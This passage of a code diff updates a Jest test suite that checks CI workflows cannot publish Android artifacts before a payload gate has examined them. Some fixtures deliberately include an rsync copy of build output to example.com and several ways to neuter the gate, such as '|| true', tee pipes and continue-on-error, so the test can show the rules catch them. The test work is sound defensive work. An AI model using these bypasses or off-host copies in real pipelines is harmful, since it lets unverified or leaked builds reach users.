+    // it is ordered after a gate that never opened it.
+    job.steps.push({
+      workflow: 'ci.yml',
+      job: 'build-android',
+      index: job.steps.length,
+      name: 'Upload the bundle to Play',
+      run: 'bundle exec fastlane upload_android_alpha',
+      uses: '',
+      with: {},
+      raw: {},
+    });
+
+    expect(violationsOfOrdering(m)).toEqual([]);
+    expect(violationsOfPathIdentity(m)).toEqual([
+      expect.stringContaining('app-prod-release.aab'),
+    ]);
+  });
+
+  it('path identity fails when a step rewrites the artifact after the gate read it', () => {
+    const m = broken();
+    const job = jobIn(m, 'release.yml', 'build_android');
+    const gate = job.steps.findIndex(isGateStep);
+    job.steps.splice(gate + 1, 0, {
+      workflow: 'release.yml',
+      job: 'build_android',
+      index: 0,
+      name: 'Re-sign the APK',
+      run: 'apksigner sign android/app/build/outputs/apk/prod/release/app-prod-release.apk',
+      uses: '',
+      with: {},
+      raw: {},
+    });
+    reindex(job);
+
+    expect(violationsOfOrdering(m)).toEqual([]);
+    expect(violationsOfPathIdentity(m)).toEqual([
+      expect.stringContaining('Re-sign the APK'),
+    ]);
+  });
+
+  it.each([
+    ['a skipping if:', step => (step.raw.if = false)],
+    ['continue-on-error', step => (step.raw['continue-on-error'] = true)],
+    ['a || fallback', step => (step.run = `${step.run.trim()} || true`)],
+    [
+      'a pipe into tee',
+      step => (step.run = `${step.run.trim()} 2>&1 | tee gate.log`),
+    ],
+    ['a trailing unrelated command', step => (step.run += '\necho done')],
+    ['a test manifest', step => (step.run += ' --manifest /tmp/weak.json')],
+  ])(
+    'the gate-can-fail rule catches a gate neutered by %s',
+    (_label, neuter) => {
+      const m = broken();
+      neuter(
+        stepIn(m, 'ci.yml', 'build-android', 'Verify the Android payload'),
+      );
+
+      expect(violationsOfOrdering(m)).toEqual([]);
+      expect(violationsOfGateCanFail(m).length).toBeGreaterThan(0);
+    },
+  );
+
+  it('the cross-job rule fails when a job downloads the build output and publishes it', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-and-test');
+    job.steps.push(
+      {
+        workflow: 'ci.yml',
+        job: 'build-and-test',
+        index: job.steps.length,
+        name: 'Download the APK',
+        run: '',
+        uses: 'actions/download-artifact@v4',
+        with: {name: 'android-release-apk'},
+        raw: {},
+      },
+      {
+        workflow: 'ci.yml',
+        job: 'build-and-test',
+        index: job.steps.length + 1,
+        name: 'Publish it',
+        run: 'gh release upload v1.0.0 app-prod-release.apk',
+        uses: '',
+        with: {},
+        raw: {},
+      },
+    );
+
+    expect(violationsOfCrossJobPublish(m)).toEqual([
+      expect.stringContaining('Publish it'),
+    ]);
+  });
+
+  /**
+   * The two allowlist entries carrying no assertion of their own claim the
+   * ordering rules hold them. Checked here rather than asserted, and across
+   * every spelling of a path — a rule keyed on literal filenames holds only
+   * for the spelling it can read, and a glob, a bare directory or an
+   * expression reaches the same bytes while matching none of them.
+   */
+  const SPELLINGS = [
+    [
+      'an explicit filename',
+      'android/app/build/outputs/bundle/prodRelease/app-prod-release.aab',
+      'app-prod-release.aab',
+    ],
+    [
+      'a glob',
+      'android/app/build/outputs/**/*.aab',
+      'cannot resolve to a filename',
+    ],
+    [
+      'a bare directory',
+      'android/app/build/outputs/apk/prod/release/',
+      'cannot resolve to a filename',
+    ],
+    ['an expression', '${{ env.APK_PATH }}', 'cannot resolve to a filename'],
+  ];
+
+  it.each(
+    SPELLINGS.flatMap(([spelling, value, fragment]) => [
+      [
+        `actions/upload-artifact@v4 with ${spelling}`,
+        {uses: 'actions/upload-artifact@v4', with: {name: 'out', path: value}},
+        fragment,
+      ],
+      [
+        `softprops/action-gh-release@v1 with ${spelling}`,
+        {uses: 'softprops/action-gh-release@v1', with: {files: value}},
+        fragment,
+      ],
+    ]),
+  )('path identity catches %s', (_label, step, fragment) => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    job.steps.push({
+      ...step,
+      workflow: 'ci.yml',
+      job: 'build-android',
+      index: job.steps.length,
+      name: 'Ship the build output',
+      run: '',
+      raw: {},
+    });
+
+    expect(violationsOfOrdering(m)).toEqual([]);
+    expect(violationsOfPathIdentity(m)).toEqual([
+      expect.stringContaining(fragment),
+    ]);
+  });
+
+  // The sharpest form: an APK published before the gate has run at all, by a
+  // step whose path names no file. Every rule read past it before it was
+  // classified as a publisher with an unresolvable path.
+  it('both rules catch a directory-path upload spliced above the gate', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    const gate = job.steps.findIndex(isGateStep);
+    job.steps.splice(gate, 0, {
+      workflow: 'ci.yml',
+      job: 'build-android',
+      index: 0,
+      name: 'Upload the APK directory',
+      run: '',
+      uses: 'actions/upload-artifact@v4',
+      with: {
+        name: 'android-release-apk',
+        path: 'android/app/build/outputs/apk/prod/release/',
+      },
+      raw: {},
+    });
+    reindex(job);
+
+    expect(violationsOfOrdering(m)).toEqual([
+      expect.stringContaining('Upload the APK directory'),
+    ]);
+    expect(violationsOfPathIdentity(m)).toEqual([
+      expect.stringContaining('cannot resolve to a filename'),
+    ]);
+  });
+
+  it('the lane-split rule fails when the fastlane lanes are re-merged', () => {
+    const m = broken();
+    const build = m.lanes.find(lane => lane.name === 'build_android_release');
+    build.body += '\n    upload_to_play_store(track: "alpha")\n';
+
+    expect(violationsOfLaneSplit(m)).toEqual([
+      expect.stringContaining('build_android_release'),
+    ]);
+  });
+
+  it('the suspicion net fails on an unrecognised action, and on an unclassified transport', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-and-test');
+    job.steps.push(
+      {
+        workflow: 'ci.yml',
+        job: 'build-and-test',
+        index: job.steps.length,
+        name: 'Ship it somewhere',
+        run: '',
+        uses: 'some-org/publish-anywhere@v1',
+        with: {},
+        raw: {},
+      },
+      {
+        workflow: 'ci.yml',
+        job: 'build-and-test',
+        index: job.steps.length + 1,
+        name: 'Copy it out',
+        run: 'rsync -a build/ example.com:/srv/',
+        uses: '',
+        with: {},
+        raw: {},
+      },
+    );
+
+    expect(violationsOfSuspicionNet(m)).toEqual([
+      expect.stringContaining('Ship it somewhere'),
+      expect.stringContaining('Copy it out'),
+    ]);
+  });
+
+  it('the building-job count fails first when a fourth Android build job appears', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-and-test');
+    job.steps.push({
+      workflow: 'ci.yml',
+      job: 'build-and-test',
+      index: job.steps.length,
+      name: 'Build Android Release',
+      run: './gradlew assembleProdRelease',
+      uses: '',
+      with: {},
+      raw: {},
+    });
+
+    const building = allJobs(m)
+      .filter(candidate => isBuildingJob(candidate, m.lanes))
+      .map(candidate => `${candidate.workflow}/${candidate.id}`);
+    expect(building).toHaveLength(4);
+  });
+});

--- a/scripts/__tests__/android-publish-ordering.test.js
+++ b/scripts/__tests__/android-publish-ordering.test.js
@@ -4,14 +4,18 @@ const yaml = require('js-yaml');
 
 /**
  * Nothing may ship an Android artifact that the payload gate has not examined.
- * That property used to live in three YAML comments, where a step reordering,
- * an added `if:`, or a publishing step in a new workflow would break it in
- * silence. Here it is read off the committed workflow and Fastfile text.
+ * The property is read off the committed workflow and Fastfile text: a step
+ * reordering, an added `if:`, or a publishing step in a new workflow all break
+ * it, and none of them announces itself.
  *
- * The rules below are applied to a parsed model, never to the files in place,
- * so every one of them is also exercised against a deliberately broken copy —
- * a rule asserted only over the committed files is true today and held by
- * nothing tomorrow.
+ * Two things about the shape. The rules are applied to a parsed model, never to
+ * the files in place, so every one of them is also exercised against a
+ * deliberately broken copy — a rule asserted only over the committed files is
+ * true today and held by nothing tomorrow. And inside a job that builds
+ * Android the default is inverted: a step `ACCOUNTED_STEPS` does not name is a
+ * violation. Recognising every way a step might publish is a question about an
+ * open set; naming the steps this repository has is a question about a closed
+ * one.
  */
 const ROOT = path.join(__dirname, '..', '..');
 const WORKFLOW_DIR = path.join(ROOT, '.github', 'workflows');
@@ -42,45 +46,45 @@ const SUSPICIOUS_RUN =
  * discuss the very actions this file classifies — the upload lane's comment
  * quotes `gradle(task: "bundle")` to explain why it does not build.
  *
- * Quote-aware, because every consumer of this text is an unanchored presence
- * test: dropping a line's tail can only *lose* matches, which moves a step
- * toward "unclassified" and "exempt". `gh release upload … --notes "Fixes #862"`
- * is an ordinary line, and a naive strip turns it into a step that publishes
- * nothing and transports nothing. Failing that direction is the one direction
- * this file cannot afford.
- *
- * An unbalanced quote leaves the rest of the line unstripped, which keeps text
- * rather than losing it — wrong in the safe direction.
+ * Quote state carries across lines, because a `run: |` block is one script and
+ * a quoted string may span several of them. Every consumer of this text is an
+ * unanchored presence test, so dropping a line's tail can only *lose* matches,
+ * which moves a step toward "publishes nothing" and "carries no transport" —
+ * the one direction this file cannot afford to be wrong in. An unbalanced
+ * quote therefore leaves the remainder unstripped: noisier, never blinder.
  */
 function codeOf(text) {
-  return String(text).split('\n').map(stripComment).join('\n');
-}
-
-function stripComment(line) {
+  const lines = String(text).split('\n');
   let quote = null;
-  for (let i = 0; i < line.length; i++) {
-    const character = line[i];
-    if (quote) {
-      if (character === '\\') {
-        i++;
-      } else if (character === quote) {
-        quote = null;
+  return lines
+    .map(line => {
+      let cut = line.length;
+      for (let i = 0; i < line.length; i++) {
+        const character = line[i];
+        if (quote) {
+          if (character === '\\') {
+            i++;
+          } else if (character === quote) {
+            quote = null;
+          }
+          continue;
+        }
+        if (character === '"' || character === "'") {
+          quote = character;
+          continue;
+        }
+        if (
+          character === '#' &&
+          line[i + 1] !== '{' &&
+          (i === 0 || /\s/.test(line[i - 1]))
+        ) {
+          cut = i;
+          break;
+        }
       }
-      continue;
-    }
-    if (character === '"' || character === "'") {
-      quote = character;
-      continue;
-    }
-    const startsComment =
-      character === '#' &&
-      line[i + 1] !== '{' &&
-      (i === 0 || /\s/.test(line[i - 1]));
-    if (startsComment) {
-      return line.slice(0, i);
-    }
-  }
-  return line;
+      return line.slice(0, cut);
+    })
+    .join('\n');
 }
 
 function parseLanes() {
@@ -263,16 +267,31 @@ function pathFieldNames(value) {
 function commandNames(text) {
   const names = new Set();
   for (const token of String(text ?? '').split(/[\s'"(),]+/)) {
-    if (!token || !/build\/outputs|\.(?:apk|aab)/.test(token)) {
+    if (!token || /^[a-z][a-z0-9+.-]*:\/\//i.test(token)) {
+      continue;
+    }
+    // A word is a candidate path if it is shaped like one: a directory
+    // separator or a wildcard. Asking only about tokens that already spell
+    // `.apk` made an indirect path invisible rather than unresolvable. A bare
+    // `"$ARTIFACT"` is not caught here and does not need to be — it resolves
+    // to nothing, and a publisher that resolves to nothing is refused below.
+    const looksLikeAPath = token.includes('/') || /[*?]/.test(token);
+    if (!looksLikeAPath) {
       continue;
     }
     const base = token.split('/').pop();
     const concrete =
-      !token.includes('${{') &&
+      !token.includes('$') &&
       !/[*?]/.test(token) &&
       !token.endsWith('/') &&
-      /\.(?:apk|aab)$/.test(base);
-    names.add(concrete ? base : UNRESOLVED_PATH);
+      /\.[A-Za-z0-9]+$/.test(base);
+    if (concrete) {
+      if (/\.(?:apk|aab)$/.test(base)) {
+        names.add(base);
+      }
+      continue;
+    }
+    names.add(UNRESOLVED_PATH);
   }
   return [...names];
 }
@@ -280,11 +299,9 @@ function commandNames(text) {
 /**
  * Every way this repository can put built bytes in front of someone.
  *
- * Additive, not first-match. A step can be more than one of these at once —
- * `gh release upload <dir>` appended to the Play-upload step is both — and a
- * single path list can mix a filename the gate examined with a glob reaching a
- * second artifact it never saw. Returning on the first match lets the second
- * one through under cover of the first.
+ * Additive, not first-match: a step can be more than one of these at once, and
+ * a single path list can mix a filename the gate examined with a glob reaching
+ * a second artifact it never saw.
  */
 function publisherOf(step, lanes) {
   const text = stepText(step, lanes);
@@ -348,62 +365,68 @@ const namesNoAndroidArtifact = (step, _job, m) =>
 const carriesNoTransport = (step, _job, m) =>
   !MOVES_BYTES_AT_ALL.test(stepText(step, m.lanes));
 
-/**
- * A property of the job, so it is never the whole assertion: on its own it
- * leaves a step free to grow a transport of its own while the gate below it
- * keeps the exemption green.
- */
+/** A property of the job, so it is never the whole assertion. */
 const gatedLaterInTheSameJob = (step, job) =>
   job.steps.some(other => other.index > step.index && isGateStep(other));
 
-const buildsThenIsGated = (step, job, m) =>
-  gatedLaterInTheSameJob(step, job) &&
-  namesNoAndroidArtifact(step, job, m) &&
-  carriesNoTransport(step, job, m);
+const handlesNoArtifact = (step, job, m) =>
+  namesNoAndroidArtifact(step, job, m) && carriesNoTransport(step, job, m);
 
-/**
- * Never on its own either: it reads only the job, so a step inside a job that
- * builds nothing could grow any transport it liked and stay exempt. Paired
- * with the step half at every use.
- */
+const buildsThenIsGated = (step, job, m) =>
+  gatedLaterInTheSameJob(step, job) && handlesNoArtifact(step, job, m);
+
+const pushesOnlyTheBumpCommit = (step, job, m) =>
+  gitPushArguments(step.run).every(args => args === '') &&
+  namesNoAndroidArtifact(step, job, m);
+
+/** Reads only the job, so it is paired with a step-reading half at every use. */
 const runsNoAndroidGradle = (step, job, m) => !isBuildingJob(job, m.lanes);
 
 /**
- * A step the suspicion net flags that publishes nothing. Each entry states why
- * and, beside it, the assertion that goes red when the reason stops holding —
- * an exemption asserted only in prose is the hole this whole file exists to
- * close.
+ * Every step of a building job that is neither the gate nor a publisher, plus
+ * the steps outside those jobs that the suspicion net flags.
+ *
+ * This list is the whole point of the design. Deciding whether a step publishes
+ * by recognising what publishing looks like is a blacklist over free-form shell
+ * and YAML, and it leaked in five consecutive spellings. The default is
+ * inverted here: inside a job that builds Android, a step this list does not
+ * account for is a **violation**, not a step nobody looked at. Recognising
+ * every way to publish is impossible; enumerating the steps this repository
+ * actually has is a page of text.
+ *
+ * Each entry states why the step ships nothing and, beside it, the assertion
+ * that goes red when that stops being true. A new step in a building job costs
+ * a reviewed line here — the same price as a fourth building job.
  */
-const NON_PUBLISHERS = [
-  {
+const ACCOUNTED_STEPS = [
+  // release.yml / build_android
+  ...[
+    ['Maximize build space', 'frees disk before the toolchains install'],
+    ['Install dependencies', 'installs the JS dependency tree'],
+    [
+      'Derive the rnllama variant allowlist from the payload manifest',
+      'reads the manifest and exports a gradle property',
+    ],
+    ['Bump versions', 'rewrites the version in tracked files'],
+    ['Set up Android Keystore', 'writes the signing keystore'],
+    ['Create .env file', 'writes build configuration'],
+    [
+      'Verify the variant allowlist reached the llama.rn build',
+      'greps the build log for the declared variant list',
+    ],
+  ].map(([step, reason]) => ({
     workflow: 'release.yml',
-    job: 'build_ios',
-    step: 'Build and upload iOS app',
-    reason: 'uploads to TestFlight; carries no Android payload',
-    // Not `carriesNoTransport`: the iOS lane legitimately runs
-    // `upload_to_testflight`, so naming no Android artifact is the half that
-    // can hold here — and it is what goes red if this step gains one.
-    assert: (step, job, m) =>
-      runsNoAndroidGradle(step, job, m) &&
-      namesNoAndroidArtifact(step, job, m) &&
-      m.lanes
-        .filter(lane => lane.origin === 'ios')
-        .every(lane => !publishesAndroid(lane.body)),
-  },
+    job: 'build_android',
+    step,
+    reason,
+    assert: handlesNoArtifact,
+  })),
   {
     workflow: 'release.yml',
     job: 'build_android',
     step: 'Commit and push version changes',
     reason: 'pushes the version-bump commit; the tag is pushed after the gate',
-    assert: step => gitPushArguments(step.run).every(args => args === ''),
-  },
-  {
-    workflow: 'release.yml',
-    job: 'build_android',
-    step: 'Set up Android Keystore',
-    reason: 'writes the signing keystore; matched only on the key file name',
-    assert: (step, job, m) =>
-      namesNoAndroidArtifact(step, job, m) && carriesNoTransport(step, job, m),
+    assert: pushesOnlyTheBumpCommit,
   },
   {
     workflow: 'release.yml',
@@ -412,14 +435,31 @@ const NON_PUBLISHERS = [
     reason: 'builds the artifacts the gate then examines in the same job',
     assert: buildsThenIsGated,
   },
-  {
+
+  // ci.yml / build-android
+  ...[
+    ['Maximize build space', 'frees disk before the toolchains install'],
+    ['Install Yarn', 'installs the package manager'],
+    ['Install dependencies', 'installs the JS dependency tree'],
+    [
+      'Derive the rnllama variant allowlist from the payload manifest',
+      'reads the manifest and exports a gradle property',
+    ],
+    ['Create dummy google-services.json for CI', 'writes a placeholder config'],
+    ['Create dummy .env file for CI', 'writes placeholder build configuration'],
+    ['Create dummy release keystore for CI', 'writes a throwaway signing key'],
+    ['ccache statistics', 'prints compiler cache counters'],
+    [
+      'Verify the variant allowlist reached the llama.rn build',
+      'greps the build log for the declared variant list',
+    ],
+  ].map(([step, reason]) => ({
     workflow: 'ci.yml',
     job: 'build-android',
-    step: 'Create dummy release keystore for CI',
-    reason: 'writes a throwaway signing key; matched only on the file name',
-    assert: (step, job, m) =>
-      namesNoAndroidArtifact(step, job, m) && carriesNoTransport(step, job, m),
-  },
+    step,
+    reason,
+    assert: handlesNoArtifact,
+  })),
   {
     workflow: 'ci.yml',
     job: 'build-android',
@@ -429,20 +469,34 @@ const NON_PUBLISHERS = [
   },
   {
     workflow: 'ci.yml',
-    job: 'build-ios',
-    step: 'Build iOS Release',
-    reason: 'builds an iOS binary and transports nothing',
-    assert: (step, job, m) =>
-      namesNoAndroidArtifact(step, job, m) && carriesNoTransport(step, job, m),
+    job: 'build-android',
+    step: 'Verify prod APK has no automation-bridge code (DCE sanity check)',
+    reason: 'reads the built APK to assert what it does not contain',
+    // Names the APK by design, so only the transport half can hold here.
+    assert: carriesNoTransport,
   },
-  {
+
+  // e2e-tests.yml / build-android
+  ...[
+    ['Install dependencies', 'installs the JS dependency tree'],
+    [
+      'Derive the rnllama variant allowlist from the payload manifest',
+      'reads the manifest and exports a gradle property',
+    ],
+    ['Create dummy google-services.json for CI', 'writes a placeholder config'],
+    ['Create dummy .env file for CI', 'writes placeholder build configuration'],
+    ['Create dummy release keystore for CI', 'writes a throwaway signing key'],
+    [
+      'Verify the variant allowlist reached the llama.rn build',
+      'greps the build log for the declared variant list',
+    ],
+  ].map(([step, reason]) => ({
     workflow: 'e2e-tests.yml',
     job: 'build-android',
-    step: 'Create dummy release keystore for CI',
-    reason: 'writes a throwaway signing key; matched only on the file name',
-    assert: (step, job, m) =>
-      namesNoAndroidArtifact(step, job, m) && carriesNoTransport(step, job, m),
-  },
+    step,
+    reason,
+    assert: handlesNoArtifact,
+  })),
   {
     workflow: 'e2e-tests.yml',
     job: 'build-android',
@@ -450,12 +504,28 @@ const NON_PUBLISHERS = [
     reason: 'builds the artifact the gate then examines in the same job',
     assert: buildsThenIsGated,
   },
+
+  // Outside the building jobs, where the suspicion net is what flags a step.
+  {
+    workflow: 'release.yml',
+    job: 'build_ios',
+    step: 'Build and upload iOS app',
+    reason: 'uploads to TestFlight; carries no Android payload',
+    // Not the transport half: the iOS lane legitimately runs
+    // `upload_to_testflight`, so naming no Android artifact is what can hold.
+    assert: (step, job, m) =>
+      runsNoAndroidGradle(step, job, m) &&
+      namesNoAndroidArtifact(step, job, m) &&
+      m.lanes
+        .filter(lane => lane.origin === 'ios')
+        .every(lane => !publishesAndroid(lane.body)),
+  },
   {
     workflow: 'ci.yml',
-    job: 'build-android',
-    step: 'Verify prod APK has no automation-bridge code (DCE sanity check)',
-    reason: 'reads the built APK to assert what it does not contain',
-    assert: carriesNoTransport,
+    job: 'build-ios',
+    step: 'Build iOS Release',
+    reason: 'builds an iOS binary and transports nothing',
+    assert: handlesNoArtifact,
   },
   {
     workflow: 'l10n-upload.yml',
@@ -465,16 +535,6 @@ const NON_PUBLISHERS = [
     assert: (step, job, m) =>
       runsNoAndroidGradle(step, job, m) && namesNoAndroidArtifact(step, job, m),
   },
-  // The gate steps name the artifact they open, so the net flags them. They
-  // are exempt from it and governed by the gate rules instead, which are stricter than any
-  // exemption: no if:, no suppression, no pipe, and the check last.
-  ...['release.yml', 'ci.yml', 'e2e-tests.yml'].map(workflow => ({
-    workflow,
-    job: workflow === 'release.yml' ? 'build_android' : 'build-android',
-    step: 'Verify the Android payload',
-    reason: 'is the payload gate itself',
-    assert: isGateStep,
-  })),
 ];
 
 const COMPOSITE_ACTIONS = {
@@ -491,14 +551,25 @@ const COMPOSITE_ACTIONS = {
 /**
  * Takes the source, not the path, so a mutated composite can be probed.
  *
- * Reads `with:` as well as `run:` and `uses:`, mirroring `stepText` — a
- * composite's inner steps are steps, and the one that ships bytes is far more
+ * A composite's inner steps are steps, and the one that ships bytes is more
  * likely to be `uses: actions/upload-artifact@v4` with a `path:` than a raw
- * shell command. Reading two of the three fields is how a composite that
- * uploads the APK, or caches `build/outputs`, reads as shipping nothing.
+ * shell command, so all three fields are read — the same text `stepText`
+ * gives a step.
  */
 const shipsNothing = source => {
-  const steps = yaml.load(source).runs.steps || [];
+  const runs = yaml.load(source).runs ?? {};
+  // Only a composite is a list of steps this can read. `using: node20` and
+  // `using: docker` run code this parse never sees, and a composite with no
+  // steps at all is a shape it has never been shown, so none of them can be
+  // judged — and "cannot judge" is not "ships nothing".
+  if (
+    runs.using !== 'composite' ||
+    !Array.isArray(runs.steps) ||
+    runs.steps.length === 0
+  ) {
+    return false;
+  }
+  const steps = runs.steps;
   const text = steps
     .map(step =>
       [step.run || '', step.uses || '', JSON.stringify(step.with || {})].join(
@@ -527,7 +598,7 @@ const cacheReachesNoBuildOutput = step =>
 
 /**
  * The actions a step may use without being classified. Floored exactly like
- * NON_PUBLISHERS: otherwise the cheapest way to publish through a new
+ * ACCOUNTED_STEPS: otherwise the cheapest way to publish through a new
  * third-party action is to add its name here.
  *
  * An entry declares **either** an `assert` that some input can falsify — the
@@ -667,8 +738,8 @@ const PROBE_JOB_WITHOUT_EXCUSES = {
 
 // -- the rules -------------------------------------------------------------
 
-function exemptionFor(step) {
-  return NON_PUBLISHERS.find(
+function accountedEntryFor(step) {
+  return ACCOUNTED_STEPS.find(
     entry =>
       entry.workflow === step.workflow &&
       entry.job === step.job &&
@@ -699,6 +770,19 @@ function violationsOfOrdering(m) {
 }
 
 /**
+ * The publisher classes that must name what they ship. A tag push genuinely
+ * names no artifact; the other four cannot publish without one, so resolving
+ * to nothing means the parse could not read what they send — never that they
+ * send nothing.
+ */
+const MUST_NAME_AN_ARTIFACT = new Set([
+  'workflow-artifact',
+  'github-release',
+  'play-upload',
+  'gh-release-cli',
+]);
+
+/**
  * Path identity: the gate below a publishing step examined the bytes it publishes, and
  * nothing between the two named that artifact again. Ordering alone binds the
  * gate to nothing: gating the APK while publishing the bundle is ordered and
@@ -712,6 +796,16 @@ function violationsOfPathIdentity(m) {
       const publisher = publisherOf(step, m.lanes);
       if (!publisher) {
         continue;
+      }
+      // An empty path set is the failure this rule exists to prevent, so it
+      // cannot be the shape a satisfied one takes.
+      if (
+        publisher.paths.length === 0 &&
+        publisher.rules.some(rule => MUST_NAME_AN_ARTIFACT.has(rule))
+      ) {
+        problems.push(
+          `${where(step)} publishes, but this parse could not read any path out of it, so no gate step can be shown to have examined what it sends`,
+        );
       }
       for (const artifact of publisher.paths) {
         if (artifact === UNRESOLVED_PATH) {
@@ -752,7 +846,7 @@ function violationsOfPathIdentity(m) {
 
 /** `if: always()` and friends run a step whatever the gate decided. */
 const RUNS_REGARDLESS =
-  /always\s*\(\s*\)|failure\s*\(\s*\)|cancelled\s*\(\s*\)/;
+  /always\s*\(\s*\)|failure\s*\(\s*\)|cancelled\s*\(\s*\)/i;
 
 /**
  * The gate can still fail the job, and a failed gate still stops the publish.
@@ -763,7 +857,7 @@ const RUNS_REGARDLESS =
  * pipefail, so a trailing `| tee` exits with tee's status. And a publishing
  * step carrying `if: always()` runs on a build the gate has just refused,
  * while its position in the job is still perfectly correct. `if: always()`
- * appears three and seven lines above two of the uploads already, so it is the
+ * already appears seven lines above each of two uploads, so it is the
  * idiomatic thing to write there.
  */
 function violationsOfGateCanFail(m) {
@@ -795,39 +889,35 @@ function violationsOfGateCanFail(m) {
       complain('carries continue-on-error');
     }
     if (step.raw.shell !== undefined) {
-      complain('overrides shell:, which changes whether a pipe can hide it');
+      complain('overrides shell:, which changes how a failure propagates');
     }
-    if (step.run.includes('||')) {
-      complain('suppresses its exit status with ||');
-    }
-    if (step.run.replace(/\|\|/g, '').includes('|')) {
-      complain('pipes its output, so it exits with the last command status');
-    }
-    // `+o errexit` is the same instruction spelled long; the short form alone
-    // was the whole check.
-    if (/set\s+\+(?:e\b|o\s+errexit)/.test(step.run)) {
-      complain('disables errexit');
-    }
-    if (step.run.includes('--manifest')) {
-      complain('passes --manifest, which is a test flag');
-    }
+
+    // The shape is pinned, rather than a list of ways to defeat it. Every way
+    // `bash -e` can be made to report success for a failing command is a shell
+    // feature — `||`, a pipe, `&`, `!`, `if`/`while`, `set +e` in its several
+    // spellings, `trap … ERR`, another command after it on the same line — and
+    // enumerating them is a blacklist over the shell. What the gate step is
+    // allowed to be is one command, optionally after `set -euo pipefail`, and
+    // that is a list of two.
     const commands = step.run
       .replace(/\\\n\s*/g, ' ')
       .split('\n')
       .map(line => line.trim())
-      .filter(line => line && !line.startsWith('#'));
-    const final = commands[commands.length - 1] ?? '';
-    // Must *begin* the final command, not merely appear in it. `bash -e` reports
-    // no failure for a command it only inspected: `if <gate>; then …; fi` and
-    // `while <gate>; do …; done` both exit 0, as does a negated `! <gate>`.
-    // Testing only for the script's presence rewards collapsing the multi-line
-    // `if` — which the old parse did catch — onto one line.
-    if (!/^node\s+\S*verify-android-payload\.js\b/.test(final)) {
-      complain('does not invoke the payload check as its final command');
+      .filter(Boolean);
+    const invocation =
+      /^node\s+\S*verify-android-payload\.js(\s+--[\w-]+(\s+\S+)?)*$/;
+    const permitted =
+      (commands.length === 1 && invocation.test(commands[0])) ||
+      (commands.length === 2 &&
+        commands[0] === 'set -euo pipefail' &&
+        invocation.test(commands[1]));
+    if (!permitted) {
+      complain(
+        'does not run the payload check as its whole script; the only permitted shape is the invocation, optionally after `set -euo pipefail`',
+      );
     }
-    // Backgrounded, so the shell moves on and never sees the exit status.
-    if (/&\s*$/.test(final)) {
-      complain('backgrounds the payload check with &');
+    if (step.run.includes('--manifest')) {
+      complain('passes --manifest, which is a test flag');
     }
   }
   return problems;
@@ -858,11 +948,56 @@ function violationsOfLaneSplit(m) {
     .map(lane => `${lane.origin} lane ${lane.name} both builds and publishes`);
 }
 
+/**
+ * Inside a building job, every step is accounted for or it is a violation.
+ *
+ * This is the inversion. The other rules ask "does this step publish?", which
+ * is a question about an open set — free-form shell, arbitrary actions, any
+ * spelling of a path — and each round of review found another spelling it
+ * answered wrongly. This one asks "is this step one of the ones we know
+ * about?", which is a question about a closed set: the steps committed to this
+ * repository. An unrecognised step is refused rather than skipped, so a new way
+ * to publish does not have to be recognised in order to be caught.
+ */
+function violationsOfUnaccountedSteps(m) {
+  const problems = [];
+  for (const job of allJobs(m)) {
+    if (!isBuildingJob(job, m.lanes)) {
+      continue;
+    }
+    for (const step of job.steps) {
+      if (isGateStep(step) || publisherOf(step, m.lanes)) {
+        continue;
+      }
+      // An allowlisted action carries its own reason and assertion already.
+      if (step.uses && ALLOWED_ACTIONS[step.uses]) {
+        continue;
+      }
+      if (!accountedEntryFor(step)) {
+        problems.push(
+          `${where(step)} is in a job that builds Android and is not accounted for`,
+        );
+      }
+    }
+  }
+  return problems;
+}
+
 /** Anything that looks like it could ship bytes is classified or exempt. */
 function violationsOfSuspicionNet(m) {
+  const building = new Set(
+    allJobs(m)
+      .filter(job => isBuildingJob(job, m.lanes))
+      .map(job => `${job.workflow}/${job.id}`),
+  );
   return allSteps(m)
     .filter(step => {
-      if (publisherOf(step, m.lanes) || exemptionFor(step)) {
+      // Building jobs are covered by the stronger rule above, which accounts
+      // for every step rather than only the ones a pattern notices.
+      if (building.has(`${step.workflow}/${step.job}`)) {
+        return false;
+      }
+      if (publisherOf(step, m.lanes) || accountedEntryFor(step)) {
         return false;
       }
       return step.uses
@@ -943,7 +1078,7 @@ describe('the parse itself', () => {
     );
     expect(suspicious.length).toBeGreaterThan(0);
 
-    for (const entry of NON_PUBLISHERS) {
+    for (const entry of ACCOUNTED_STEPS) {
       const matched = allSteps(committed).filter(
         step =>
           step.workflow === entry.workflow &&
@@ -1002,17 +1137,16 @@ describe('the parse itself', () => {
    *
    * Two probe jobs, because one is not enough: an assertion deciding purely on
    * the job is falsified by the building-job probe without ever looking at the
-   * step it was handed, and reads as sound. The second job satisfies every
-   * job-level predicate — builds nothing, gate below the step — so only the
-   * step half can carry it there. Add a probe whenever an exemption learns to
-   * read something new.
+   * step it was handed. The second job satisfies every job-level predicate —
+   * builds nothing, gate below the step — so only the step half can carry it
+   * there. Add a probe whenever an exemption learns to read something new.
    */
   it.each([
     ['a building job with no gate', () => PROBE_JOB],
     ['a job with every excuse removed', () => PROBE_JOB_WITHOUT_EXCUSES],
   ])('rests no exemption on an assertion that cannot fail, in %s', (_l, of) => {
     const job = of();
-    for (const entry of NON_PUBLISHERS) {
+    for (const entry of ACCOUNTED_STEPS) {
       expect({
         entry: `${entry.workflow} ${entry.step}`,
         survivesTheProbe: entry.assert(PROBE_STEP, job, committed),
@@ -1083,6 +1217,7 @@ describe('no publish outruns the payload gate', () => {
     ['cross-job publishing', violationsOfCrossJobPublish],
     ['the lane split', violationsOfLaneSplit],
     ['the suspicion net', violationsOfSuspicionNet],
+    ['every step accounted for', violationsOfUnaccountedSteps],
   ])('%s holds over the committed workflows', (_label, rule) => {
     expect(rule(committed)).toEqual([]);
   });
@@ -1326,10 +1461,9 @@ describe('each rule is capable of failing', () => {
   });
 
   // The command-line publishers name their paths as arguments rather than in a
-  // `with:` block, and the same spellings hide an artifact there. Ordering
-  // alone held these: it fires on position, so it fired before this too — the
-  // fix is that path identity stops being vacuous, which is what the second
-  // assertion in each case is for.
+  // `with:` block, and the same spellings hide an artifact there. Both rules
+  // must fire: ordering decides on position alone, so it says nothing about
+  // whether the gate could compare what is published.
   it.each([
     ['gh release create', 'gh release create v1.0.0 dist/*.apk'],
     [
@@ -1364,9 +1498,8 @@ describe('each rule is capable of failing', () => {
     ]);
   });
 
